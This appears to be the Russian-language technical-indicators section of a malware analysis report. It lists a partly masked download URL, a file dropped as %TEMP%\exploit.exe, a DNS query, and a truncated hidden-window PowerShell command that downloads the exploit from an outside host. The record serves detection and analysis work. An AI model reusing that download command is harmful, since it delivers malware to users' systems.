Техническая информация
- http://www.fi###onvoy.com/dfl.php?id################################################## как %temp%\exploit.exe
- %TEMP%\exploit.exe
- http://www.fi###onvoy.com/dfl.php?id##################################################
- DNS ASK fi###onvoy.com
- '<SYSTEM32>\cmd.exe' /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.fi###onvoy.com/dfl.php?id#######################################################################...